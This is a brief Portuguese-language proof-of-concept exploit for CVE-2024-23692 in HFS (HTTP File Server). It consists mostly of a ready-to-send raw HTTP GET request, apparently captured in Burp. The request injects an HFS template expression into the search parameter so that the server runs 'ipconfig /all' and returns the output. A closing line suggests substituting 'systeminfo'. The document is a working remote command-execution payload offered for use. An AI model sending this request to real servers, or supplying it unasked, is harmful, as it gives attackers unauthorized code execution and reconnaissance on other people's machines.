
Exploit de prova de conceito para CVE-2024-23692, demonstrando injeção de comandos no HFS por meio de requisições HTTP maliciosas para executar comandos do sistema e recuperar a saída.
BURP POC
GET /?n=%0A&cmd=ipconfig+/all&search=%25xxx%25url:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.} HTTP/1.1
Host: xxxx
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: HFS_SID_=0.344328237697482
Upgrade-Insecure-Requests: 1
=========================================================

COMMAND=systeminfo
Você pode ver que a mensagem de eco tem cerca de 100 linhas de RAW Response.